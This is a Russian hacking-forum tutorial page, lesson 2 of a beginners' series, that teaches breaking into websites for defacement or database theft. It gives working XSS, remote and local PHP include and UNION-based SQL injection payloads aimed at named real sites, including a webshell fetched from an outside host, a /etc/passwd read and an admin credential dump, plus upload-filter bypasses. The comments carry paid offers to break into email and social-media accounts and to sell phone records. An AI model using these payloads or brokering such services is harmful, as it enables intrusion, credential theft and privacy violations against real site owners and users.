Основы хакерства. Урок 2 - нужно скрипт помощью какие сайта include данных уязвимость загрузить injection уязвимостей удалось

Поиск по Порталу

Меню

Территория Взлома

Новостная Лента

Ваша Безопасность

Взлом и Хакер

Forum.HackZona.Ru

Underground HZ

Программирование

Мануал в Помощь

Законодательство

Каталог Программ

Принять Участие

Поиск Кряков

Новичкам полезное

взлом забытых паролей
хакер высокого уровня
угон и защита уинов
cross domain scripting
конституция хакера
как делают дефейс
эксплоит: как и что
защита от вирусов
основы хакерства
основы хакинга
взлом чайников
защита от взлома
как стать хакером
скрытые процессы
взлом через telnet
в сетях спецслужб
защита от шпионов
обход и взлом firewall
взлом почтовых ящиков
новичкам об xss-взломах

Счетчики и Каталоги

сенсей учит

Серия "Основы хака"
Основы хакерства. Урок 1
Основы хакерства. Урок 2
Основы хакерства. Урок 3
Основы хакерства. Урок 4
Основы хакерства. Урок 5

Нестандартные лазейки SQL

Серия "Взлом окон"
Взлом Windows. Способ 1
Взлом Windows. Способ 2

взлом паролей хакер безопасность защита информации кряк взлом программ

FORUM.HACKZONA.RU

Основы хакерства. Урок 2
[ Хакерство для новичков ]

Основы.
Привет читатель. Я решил долго не тянуть и уже в этой статье рассказать о том, какими способами взламывают сайты, какие бывают уязвимости
и зачем собственно взламывать сайты. Что вы узнаете на сегодняшнем уроке:

Кто и зачем?

Какие бывают уязвимости.

Веб шелл, как и что.

Примечание: курсивом будут выделены слова, которые возможно будут вам не понятны. Найти их значение вы сможете в конце статьи.

Кто и зачем?
Вообще под понятием взлома я понимаю несанкционированный доступ к чему-либо.
Мы ломаем веб сайты. Поэтому нам нужно получить доступ к административной панели, либо украсть базу данных сайта, либо просто изменить главную страницу.
Все зависит от такого для чего производится взлом.
Рассмотрим основные мотивы:

Изменения главной странички ради удовольствия && мести. Это называется «дефейс» сайта
Воровство базы данных - это может быть выгодно если мы например взломаем базу данных онлайн шопа (магазина). Либо производится взлом на заказ и заказчику нужна база
Взлом производиться ради повышения прав на сервере.

Теперь поговорим о таком понятии как скрипт кидди.
Скрипт кидди - это люди, как правило не слишком разбирающихся в хаке и программировании.
Т.е. которые не могут самостоятельно найти уязвимость и реализовать ее.
Так как же они взламывают? Они попросту используют чужие наработки.
Допустим скрипт кидди нужно взломать один форум. Он узнает версию форума и идет на багтрак. Находит описание уязвимости и использует ее.
Багтраком называют сайт на котором расположены описание уязвимостей форумов CMS, и где выкладываются эксплоиты.
Либо второй вариант - для развлечения - скрипт кидди опять же идет на багтрак и выбирает уязвимость. Например, он выбирает сплоит для CMS php nuke 7.0.
Далее он идет в поисковик и делает следущюий запрос:
site: php nuke 7.0 - этим он получит список сайтов с установленной CMS Nuke
Далее он просто использует эксплоит. Это кстати называется гугл хакинг.
Как ни крутись, но через период «скрипт кидди» проходил каждый. И придется пройти тебе. Только вот некоторые двигаются дальше, а некоторые останавливаются на этом.

Какие бывают уязвимости? Три самых тривиальных уязвимостей это xss sql injection php include
В каждом уроке я буду рассказывать понемногу про каждую из них.
Сейчас разберем все вкратце не зацикливаясь на деталях уязвимости.

XSS.
Цель у этой уязвимости одна - украсть Cookes файлы.
Итак, сначала из за чего появляются Xss
Происходит все это из-за отсутствия фильтрации входящих данных
Разберем сразу на примере:
www.atlant.ws Справа мы видим текстовое поля для поиска. Попробуем ввести простой html тег [hr]
И мы увидим линию (в HTML этот тег означает провести линию)
В адресной строке мы видим:
http://www.atlant.ws/?set=search&www=false&query=[hr]
Значит данные передаются GET запросом.
Но от обычного тега опасности никакой. Попробуем ввести простенький javascript сценарий.
http://www.atlant.ws/?set=search&www=false&query=[script]alert('xss')[/script]
Опа. Появилось сообщение. Значит код выполняется. Т.к. в javascript функция alert() выводит сообщение.
Это называется пассивная xss. Пассивная она потому что нужно произвести какие то действия что бы выполнить код. В нашем случае нужно передать его в переменную запроса (q)
Кроме пассивных xss существует активные.
Опять же пример:
http://www.addtop.ru/kom.php?id=32
Вводим в комментарии скрипт
[script]alert('xss')[/script]
И отправляем его.
Видим сообщение. Теперь каждый пользователь, который найден на страничку комментариев увидит его.
Чувствуешь разницу? В пассивке нужно производить какие то действия с пользователем. Т.е. нужно передавать ему специальный адрес, по которому он должен пройти.
А в активке нужно, что бы пользователь попросту посетил страницу, в которой уже заключен наш код.
Пока про xss все. Не хочу нагружать тебя информацией. Попробуй поискать активные и пассивные xss.
Так же советую хорошенько изучить, что такое Cookes. В следующем уроке мы разберем, как их воровать. И зачем.
В конце статьи я приведу несколько полезный ссылок на эту тему.

Введение в PHP include.
Если мы найден такую уязвимость то сможем либо читать файлы на сервере либо загрузить вебшелл.
Разберем сначала, что такое веб шелл.
Веб шелл это php скрипт. C помощью него мы сможем изменять файлы сайта или выполнять команды в системе.
В общем, шелл заменяет административную панель. Собственно цель большинства взломов залить веб шелл.
Какими способами? PHP include один из них. Итак, давайте поверхностно разберем уязвимость

Видим на сайте такой url:
www.site.ru?page=home.html
Это значит, что на страничку подгружается файл home.html
А что если попробовать подгузить свой файл? Например, так:
www.site.ru?page=http:/hacker.ru/webshell.php
Так мы пробуем загрузить веб шелл на сайт.
Если мы увидим результат работы webshell.php значит нам круто повезло. И можно считать, что сайт взломан.
Это называется удаленный инклуд. Удаленный потому что нам удалось загрузить скрипт с другого сервера.
Кроме удаленных, инклуды бывают локальные.
В этом случае мы сможем только читать файлы на сервере.
Например, сейчас мы попробуем прочитать файл с именами пользователей системы:
www.site.ru?page=/etc/passwd
Вот, опять же попробуй поискать php include. Советую воспользоваться google:
Inurl:page=
Такой запрос покажет нам сайты, в урле которых присутствует строка “page=”. Далее попробуй подставить любой набор символов в параметр page. Если появиться ошибка, значит скрипт уязвим
Кстати если найдешь php инклуд, то можно получить xss вот так:
www.site.ru?page=[script]alert(/xss/)[/script]
Это работает во многих случаях.
В следующем уроке я расскажу о том: почему происходит php include, что такое null byte и трудности при чтении файлов.

Введение в SQL Injection
Очень распространенная уязвимость. Суть ее использования заключается в том, что бы вытащить необходимую нам информацию из базы данных. Обычно этими данными является логин и пароль администратора сайта.
Но иногда возможно залить шелл или прочитать файл с помощью sql injection. Об этом поговорим в следующих уроках. А сейчас самые основы
Мы будем разбирать инъекцию при работе с базой данных my sql. Она самая распространенная. Кроме нее часто встречаются mssql, oracle. Каждую нужно взламывать по-своему. Но сейчас mysql. Уязвимость можно найти, если мы увидим что в адресной строке параметру передается числовое значение. Например:
http://www.descom.ch/main.php?id=18646644
Что бы проверить параметр на sql injection обычно подставляют кавычку
http://www.descom.ch/main.php?id=18646644' либо другие левые символы
Видим ошибку. Понимаем что это mysql.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19

Что бы вытащить информацию нужно найти кол-во полей и определить какие из них читабельны (т.е. из каких колонок можно вынудить инфу) Делается это с помощью конструкции order by.
http://www.descom.ch/main.php?id=18646644’+order+by+10/*
Вывод то же самый, значит полей меньше
http://www.descom.ch/main.php?id=18646644+order+by+7/*
Да. Вывод изменился. Значит полей 7.
Теперь нужно получить читабельные поля. http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,4,5,6,7/*
Вывод: 4,5. Узнать нам это удалось с помощью конструкции union select
У нас есть колонки. Теперь нужно получить информация о базе.
http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/*
Видим что mysql v5 - - В этой версии есть кое какие особенности при взломе, но пока разбирать это не будем и попробуем просто подобрать таблицу.
Делается это так:
http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/+from+таблица/*
таблицу нам нужно подобрать самим. Самые распространенная это user или users. Список часто используемых таблиц можно найти по этой
ссылке
В нашем случае мне удалось узнать, что имя таблицы user.
Теперь можно приступить к выводу информации. Нам нужно достать логин и пароль.
Попробуем:
http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,name,password,6,7+from+user/*
И у нас на экране логин и хеш пароля администратора.
Вот таким не хитрым образом удалось поломать базу.
Кстати здесь тоже имеет место xss:
http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,[script]alert(/xss/)[/script],5,6,7/*

Итак, мы разобрали три основных уязвимости. Я не стал пока копать глубоко, а рассказал только поверхностную информацию, что бы немного вас завлечь. В следуюих уроках
я буду рассказывать о причинах уязвимостей, так же буду приводить куски уязвимых программ. Так что желательно подучить php и mysql
Кстати набор инъекция и инклудов для тренировки ты всегда сможешь найти на форуме хакзоны:
sql inj
php inc

Еще парочка способов загрузить веб шелл.
Как ты наверное уже понял главное это веб шелл. Выше я показывал, как его можно залить с помощью php include. Но это конечно не единственный способ
На множестве сайтов присутствует возможность загрузки каких либо файлов. Уже догадался? Мы без проблем сможем вместо обычного файла подставить веб шелл. Но не все так просто. Иногда скрипт проверяет разрешение.
Допустим нам можно загрузить картинку. Но если вместо нее мы попытаемся залить файл webshell.php скрипт может проверить разрешение и запретить загрузку. Это можно обойти таким способом:
Поменять разрешение на такое:
webshell.php.jpg.
и возможно нам удастся загрузить шелл.
Но бывает, что сайт проверяет не только имя файла, но и его содержимое. Т.е он смотрит картинка это или текст
Для этого можно поступить вот так:
Открыть картинку в любом текстовом редакторе и в конце добавить php скрипт.

Термины, используемые в статье.
Ниже я приведу слова, которые возможно были тебе не понятно по ходу статьи:
Дефейс- замена страницы сайта на свою либо редактирование страницы под собственные нужны. Например "Hacked by вася"
CMS или еще говорят движок-двиг - система управления сайтом.
Эксплоит - сплоит -exploit-xploit - программа автоматически реализующая какую либо уязвимость. По сути, сплоит можно написать почти на любом язык программирования
Cookes – файлы которые применяется для сохранения данных на стороне пользователя, на практике обычно используется для:

аутентификации пользователя;
хранения персональных предпочтений и настроек пользователя;
отслеживания состояния сессии доступа пользователя;
ведения статистики о пользователях.

Если мы украдем «Куки» администратора сайта и заменим их на свои, то без проблем сможем аутентифицироваться как админ.
В следующей статье я как раз расскажу про воровство Cookes с помощью xss
bugtraq-багтрак - Сайт на котором располагаются эксплоиты и описание уязвимостей в CMS форумах и программном обеспечении.
Google hacking - гугл хакинг - Использование поисковика google для поиска уязвимых стайтов либо для сбора информации о сайте.

Послесловие
Вот и подошел к концу 2 урок. На следущем мы более подробно разберем xss php include и sql injection. Далее я покажу несколько приемов в веб хаке. И в конце мы поговорим об эксплоитах.
Для самообразования можно почитать вот это:
xss
sql injection
php include

А также
теоретические основы хакинга
Также очень советую почаще посещать багтрак и разбирать уязвимости которые там описываются. На этом пока все. Удачи!
ps все уголковые теги заменены на [ и ]

StraNger::HackZona

Разместил: --stranger--. Проверил: shurmann. Опубликовано: 20.08.2009.
Средняя оценка: 4.25. Голосов: 318. Рейтинг статьи -


Супер!	Отлично	Хорошо	Нормально	Плохо


Напечатать текущую статью \| Рекомендация Статьи Другу

Последние 15 Комментариев к Статье

Новичок скачай Delphi и взламывай аккаунты ВКОНТАКТЕ, ОДНОКЛАССНИКИ и любое МЫЛО!!! + обучающие видео - смотри как на самом деле взламывают и учись;)
http://hackzone.at.ua/ - тут скачиваем и можете отблагодарить меня нажав на рекламу (чего Вам стоит, а мне приятно)!!! Спасибо заранее)))

ВНИМАНИЕ!!! новички не верьте тем кто предлагает взлом на заказ в комментариях это просто лохи, кидалы и неудачники! Если вам действительно нужно что-то взломать ищите исполнителей на форуме forum.hackzona.ru и работайте только через ГАРАНТ hackzona.ru

Если вы просто интересуйтесь, либо изучайте тогда на сайте hackzone.at.ua вы можете скачать видео и посмотреть как действительно происходят взломы. Плюс усвойте очень хороший урок ;) Рекомендую всем)))

Спасибо за внимание=)

Гилберт пожалуйста))))))))))

Добавил: FixerCoolHacker. Добавлено: 02.09.2010.

капец))спс)

Добавил: gilbert. Добавлено: 30.08.2010.

Добавил: FixerCoolHacker. Добавлено: 27.08.2010.

Доброго всем времени суток... я Евгений Попов.

Я предлагаю свои услуги по взлому эл. почты и аккаунтов в соц. сетях.

- yandex.ru... цена 1400 р...
- mail.ru (включая все поддомены)... цена 1500 р...
- rambler.ru (включая все поддомены)... цена 1700 р...
- gmail.com... цена 1800 р...
- hotmail.com... цена 2400 р...

Я занимаюсь взломом только тех почтовых серверов, которые указаны выше... цена не изменяется (торг не уместен)... после взлома пароль не меняется (остается прежним)... работаю без предоплаты (оплата только после взлома и предоставления доказательств)... срок исполнения работы от 2-х часов, до 3-х суток (зависит от моей занятости)... оплату после взлома принимаю картами Яндекс Денег или картами WebMoney (они продаются в любом отделе Евросети), другие способы оплаты не рассматриваю.

По поводу взлома аккаунтов в соц.сетях:

На данный момент взламываю только странички на odnoklassniki.ru... стоимость данной работы 1900 р... логин и пароль так же остаются прежние... оплата после доказательств.

Ваши заказы принимаю на email# parolei.net@gmail.com

P.S. будьте внимательны, заказы принимаю только на этот email и никаких других средств связи не использую, по этому, если где то в сети увидите пост от моего имени с указанием номера icq или еще какого либо средства связи, то знайте - это МОШЕЙНИК...

Добавил: GeniiPopov. Добавлено: 26.08.2010.

Тебе интересно как взламывают аккаунты ВКОНТАКТЕ?
Качай видео уроки http://pecypz.ifolder.ru/19013654 смотри и учись!

Добавил: FixerCoolHacker. Добавлено: 24.08.2010.

Добавил: GeniiPopov. Добавлено: 24.08.2010.

Качаем Delphi: http://pecypz.ifolder.ru/18984802 и ломаем всех
Взлом ВКОНТАКТЕ, ОДНОКЛАССНИКИ и любое МЫЛО!!!
В архиве множество программ для хакера написанные на Delphi и плюс исходные коды к ним!!

Добавил: t_h_n. Добавлено: 22.08.2010.

Доброго всем времени суток...

Я neoxakep... около 2-х лет я искал по сети ребят, которые умеют что либо взламывать и любят это дело так же, как я...

На сегодняшний день мы объединились в группу и работаем вместе... кто то ломает мыло, кто то аккаунты в соц. сетях, кто то форумы и т.д. и т.п., именно по этому мы и решили работать вместе... теперь для нас открыты все "двери" в сети...

И вот теперь, когда мы начали работать профессионально, качественно, быстро и слаженно, мы решили предложить вам свои услуги:

1. Взлом email адресов, в независимости от сервера, на котором зарегистрирован email... вот цены на основные сервера:

- mail.ru... цена 1200 р...
- yandex.ru... цена 1400 р...
- rambler.ru... цена 1400 р...
- gmail.com... цена 1600 р...
- hotmail.com... цена 1800 р...

при этом пароль остается прежний (тот, по которому входит сам хозяин мыла) и по этому жертва взлома ничего не заподозрит... оплата за взлом мыла берется только после самого взлома и предоставления доказательств...

2. Взлом аккаунтов в соц. сетях, таких, как: odnoklasniki.ru, vkontakte.ru и т.д. и т.п....

пароль и логин, так же остаются прежним и жертва ничего не заподозрит, но оплата после взлома берется только в случае с odnoklasniki.ru... за взлом аккаунтов: vkontakte.ru и аккаунтов в остальных соц сетях берется предоплата в размере 40%...

стоимость взлома odnoklasniki.ru составляет 1600 р... стоимость взлома остальных аккаунтов колеблется в пределах от 900 р. до 4000 р...

Выше указаны основные наши услуги... помимо этого мы занимаемся взломом: взлом сайта, взлом форума, взлом программ, взлом rar архива, взлом игр...

Помимо услуг по взлому мы предлогаем услуги по распечатке смс сообщений и звонков... пока доступны следующие операторы:

- Билайн... цена распечатки смс за 1 месяц 900 р... цена распечатки звонков за месяц 1100 р...
- Мегафон... смс 800 р... звонки 1900 р...
- МТС... смс 1400 р... звонки 1100 р...

Так же мы до сих пор ищем таланты... и продолжаем обучение...

Наши контакты:

icq# 82-61-34-61
email# neoxakep7@gmail.com
сайт# http://www.neoxakep.h1.ru

Добавил: neoxakep. Добавлено: 14.08.2010.

у мну тож все выбило в буквах А но потом пришо сообщение что файл загружон )

Добавил: nikopoll. Добавлено: 12.08.2010.

просидел 2 часа в гугле не удалось подгрузить веб шелл не к одному сайту( та же история с PHP include.может все сайты уже защитили? или я делаю чтото не так... будем пробовать дальше)

Добавил: terminatorasa. Добавлено: 05.08.2010.

по поводу xss... вписывать надо не [hr] а <hr> ....скобки перепутали.... и этот украинский сайт по ходу уже защитили от подобных скриптов надо искать другие)

Добавил: terminatorasa. Добавлено: 04.08.2010.

ПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyrПРОГРАММАДЛЯ ВЗЛОМА ГОЛОСОВ В ВКОНТАКТЕ!тока стоит ограничение на одного пользователя можно сразу тока однаму накручивать!

http://depositfiles.com/ru/files/rfb5pzvyr

Добавил: zixis. Добавлено: 27.07.2010.

……………………………………..________
………………………………,.-‘"……………….~.,
………………………..,.-«……………………………..»-.,
…………………….,/………………………………………..":,
…………………,?………………………………………………,
………………./…………………………………………………..,}
……………../………………………………………………,:^..}
……………/……………………………………………,:"………/
…………..?…..__…………………………………..:………../
…………./__.(….."~-,_…………………………,:………./
………../(_…."~,_…….."~,_………………..,:…….._/
……….{.._$;_……"=,_……."-,_…….,.-~-,},.~";/….}
………..((…..*~_……."=-._……";,,./…./«…………../
…,,,___.~,……»~.,………………..…..}…………../
…………(….=-,,…….……………………(……;_,,-«
…………/.~,……-………………………….……/
………….~.*-,……………………………….|,./…..,__
,,_……….}.>-._……………………………..|…………..=~-,
…..=~-,__……,……………………………
……………….=~-,,.,………………………….
…………………………..:,,…………………………………..__
……………………………….=-,……………….,%>--==
Предоставляем профессиональные услуги по взлому emai, odnoklasniki.ru, vkontakte.ru:

- Стоимость от 250 р. до 1200 р. (Webmoney, Яндекс-Деньги)
- Cроки выполнения от 1-го часа до 5-ти дней
- После взлома пароль НЕ МЕНЯЕТСЯ, поэтому жертва ничего не заподозрит
- Не берем никаких предоплат и авансов, оплата только по результату, после предоставления доказательств
- Постоянным клиентам скидка 50 % (После 3-го заказа)
- Анонимность гарантируется

Так же предлогаем обучение взлому, при условии дальнейшего сотрудничества.

Контакты:

email# hacker_kom@mail.ru
icq# 616053240
наш сайт# http://hacker.webservis.ru

Добавил: mashtak-off. Добавлено: 18.07.2010.

У меня такая же проблема, наверное стотья уже устарела

Добавил: Fast126. Добавлено: 13.07.2010.

У меня проблема( Помогите, пожалуйста.
Я насчет XSS и указанного сайта. www.atlant.ws - некий "украинский портал без регистрации". Я правильно поняла, что следует ввести [hr] в строку справа под названием "поиск на портале"? Но если я так делаю, то адресная строка получается совсем другая, да и линии я не вижу, открывается гугл поиск (ну, "Результаты 1-10 по запросу [hr]", и все такое).
Что я делаю неправильно? Подскажите...

Добавил: Nikiana. Добавлено: 08.07.2010.

	Добавить Свой Комментарий
	Добавлять комментарии могут только Участники Портала!

Вход

Участник:
Пароль:

Online Монитор

Сейчас на Портале: 245
своих:7 и гостей:238

Сервис Whois

IP: